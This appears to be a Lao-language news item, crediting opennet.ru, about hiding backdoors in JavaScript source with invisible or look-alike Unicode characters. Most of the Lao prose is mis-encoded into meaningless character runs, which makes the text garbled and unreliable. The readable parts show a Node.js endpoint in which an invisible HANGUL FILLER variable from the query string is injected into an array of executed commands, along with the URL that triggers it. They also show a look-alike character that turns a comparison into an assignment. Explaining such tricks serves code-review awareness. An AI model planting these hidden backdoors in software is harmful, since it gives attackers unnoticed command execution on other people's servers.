เบเบฐเบเบดเบเบฑเบเบเบฒเบกเบงเบดเบเบตเบเบฒเบเปเบเบกเบเบตเปเบซเบผเปเบ Trojan, เปเบเบดเปเบเบญเบตเบเปเบชเปเบเบฒเบเบเปเบฒเปเบเปเบเบปเบงเบญเบฑเบเบชเบญเบ Unicode เบเบตเปเบเปเบฝเบเบเปเบฒเบชเบฑเปเบเบชเบฐเปเบเบเบเบญเบเบเปเปเบเบงเบฒเบก bidirectional, เปเบเบฑเบเบเบดเบเบญเบทเปเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเปเบเบฐเบเปเบฒเบเบฒเบเบเบฐเบเปเบฒเบเบตเปเปเบเบทเปเบญเบเปเบงเปเปเบเปเบเบทเบเปเบเบตเบเปเบเป, เบเปเบฒเปเบเปเบเบฑเบเบฅเบฐเบซเบฑเบ JavaScript. เบงเบดเบเบตเบเบฒเบเปเบซเบกเปเปเบกเปเบเบญเบตเบเปเบชเปเบเบฒเบเบเปเบฒเปเบเปเบเบปเบงเบญเบฑเบเบชเบญเบ unicode โใ คโ (เบฅเบฐเบซเบฑเบ 0x3164, โHANGUL FILLERโ), เปเบเบดเปเบเปเบเบฑเบเบเบฐเปเบเบเบเบปเบงเบญเบฑเบเบชเบญเบ, เปเบเปเบเปเปเบกเบตเปเบเบทเปเบญเปเบเบเบตเปเปเบซเบฑเบเปเบเป. เบเบฐเปเบเบ Unicode เบเบตเปเบเบปเบงเบญเบฑเบเบชเบญเบเบเบตเปเบขเบนเปเปเบเปเบเปเบเบทเบเบญเบฐเบเบธเบเบฒเบเบเบฑเปเบเปเบเป ECMAScript 2015 เบชเบฐเปเบเบฒเบฐเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเปเบฒเปเบเปเปเบเบเบทเปเบเบปเบงเปเบ JavaScript, เปเบฎเบฑเบเปเบซเปเบกเบฑเบเปเบเบฑเบเปเบเปเบเปเบเบตเปเบเบฐเบชเปเบฒเบเบเบปเบงเปเบเบเบตเปเปเบเบดเปเบเบเปเปเปเบซเบฑเบเบซเบผเบทเบเบปเบงเปเบเปเบซเบกเปเบเบตเปเบเปเปเบชเบฒเบกเบฒเบเปเบเบเบญเบญเบเบเบฒเบเบเบปเบงเปเบเบญเบทเปเบเปเปเบเบเบปเบงเปเบเปเปเบเบฅเบฐเบซเบฑเบเบเบตเปเบเบดเบเบปเบกเปเบเบฑเปเบ Notepad ++ เปเบฅเบฐ VS Code.
เบเบปเบงเบขเปเบฒเบ, เบฅเบฐเบซเบฑเบเบชเปเบฒเบฅเบฑเบเปเบเบฅเบฐเบเบฐเบเบญเบก Node.js เปเบเปเบเบทเบเบกเบญเบเปเบซเป, เปเบเบดเปเบ, เปเบเบเปเบเปเบเบปเบงเปเบเบเบตเปเบเบฐเบเบญเบเบเปเบงเบเบเบปเบงเบญเบฑเบเบชเบญเบเบเบฝเบง "ใ ค", backdoor เบเบทเบเปเบเบทเปเบญเบเปเบงเปเบเบตเปเบญเบฐเบเบธเบเบฒเบเปเบซเปเบเบฐเบเบดเบเบฑเบเบฅเบฐเบซเบฑเบเบเบตเปเบฅเบฐเบเบธเปเบงเปเปเบเบเบเบนเปเปเบเบกเบเบต: app.get('/ network_health', async (req, res) = > { const { timeout,ใ ค} = req.query; // เปเบเบเบงเบฒเบกเปเบเบฑเบเบเบดเบเบกเบฑเบเบเบญเบเบงเปเบฒ "const { timeout, ใ ค \u3164}" const checkCommands = [ 'ping -c 1 google. com', 'curl -s http:// example.com/',ใ ค // เปเบเบทเปเบญเบเปเบฒเบเบเบธเบเบเบดเบเบเบฒเบกเบเปเบงเบเบเบปเบงเบญเบฑเบเบชเบญเบ \u3164 ];
เบขเบนเป glance เบเปเบฒเบญเบดเบ, เบเบฝเบเปเบเปเบเปเบฒ timeout เปเบกเปเบเบเปเบฒเบเบเบฒเบฅเบฒเบกเบดเปเบเบตเบเบฒเบเบเบญเบ, เปเบฅเบฐ array เบเบตเปเบกเบตเบเปเบฒเบชเบฑเปเบเบเบตเปเบเบฐเบเบฐเบเบดเบเบฑเบเบกเบตเบเบฑเบเบเบตเบฅเบฒเบเบเบทเปเบเบปเบเบเบตเปเปเบเบฑเบเบญเบฑเบเบเบฐเบฅเบฒเบ. เปเบเปเปเบเบเบงเบฒเบกเปเบเบฑเบเบเบดเบ, เบซเบผเบฑเบเบเบฒเบเบเบปเบงเปเบเบเบฒเบเบซเบกเบปเบเปเบงเบฅเบฒ, เบเปเบฒเบเบญเบเบเบปเบงเปเบเบเบตเปเปเบเบดเปเบเบเปเปเปเบซเบฑเบเบญเบทเปเบเบเบตเปเบกเบตเบฅเบฐเบซเบฑเบเบเบปเบงเบญเบฑเบเบชเบญเบ \u3164 เปเบเปเบเบทเบเบกเบญเบเบซเบกเบฒเบ, เปเบเบดเปเบเบเบทเบเบเบปเบเปเบเบเปเบเบปเปเบฒเปเบ array เบเบญเบเบเปเบฒเบชเบฑเปเบเบเบฐเบเบดเบเบฑเบเปเบเป. เบเบฑเปเบเบเบฑเปเบ, เบเปเบฒเบเบฒเบเบญเบญเบเปเบเบเบเบฑเปเบเบเปเบฒเบงเบกเบตเบขเบนเป, เบเบนเปเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเปเบเบฑเปเบ "https://host:8080/network_health?%E3%85%A4=command" เปเบเบทเปเบญเปเบเบตเบเปเบเป backdoor เปเบฅเบฐเบเบฐเบเบดเบเบฑเบเบฅเบฐเบซเบฑเบเบเบญเบเบเบงเบเปเบเบปเบฒ.
เบเบปเบงเบขเปเบฒเบเบญเบตเบเบญเบฑเบเบซเบเบถเปเบเปเบกเปเบเบเบปเบงเบญเบฑเบเบชเบญเบ "ว" (ALVEOLAR CLICK), เปเบเบดเปเบเบชเบฒเบกเบฒเบเปเบเปเปเบเบทเปเบญเปเบซเปเบฎเบนเบเบฅเบฑเบเบชเบฐเบเบฐเบเบญเบเปเบเบทเปเบญเบเบซเบกเบฒเบ exclamation. เบเบปเบงเบขเปเบฒเบเปเบเบฑเปเบ, เบเบฒเบเบชเบฐเปเบเบเบญเบญเบ "if(environmentว=ENV_PROD){" เปเบกเบทเปเบญเบเบทเบเบเบฐเบเบดเบเบฑเบเปเบ Node.js 14 เบเบฐเปเบเบฑเบเบเบงเบฒเบกเบเบดเบเบชเบฐเปเปเบต, เปเบเบฒเบฐเบงเปเบฒเบกเบฑเบเบเปเปเปเบเปเบเบงเบเบชเบญเบเบเบงเบฒเบกเปเบเบเบเปเบฒเบ, เปเบเปเบกเบญเบเบเปเบฒเบเบญเบ ENV_PROD เปเบซเปเบเบฑเบเบเบปเบงเปเบ โenvironmentวโ. เบเบปเบงเบญเบฑเบเบชเบญเบ unicode เบเบตเปเปเบเบปเปเบฒเปเบเบเบดเบเบญเบทเปเบเปเบฅเบงเบกเบกเบต "๏ผ", "โ", "๏ผ", "โฉต", "โจ", "โซฝ", "๊ฟ" เปเบฅเบฐ "โ".
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru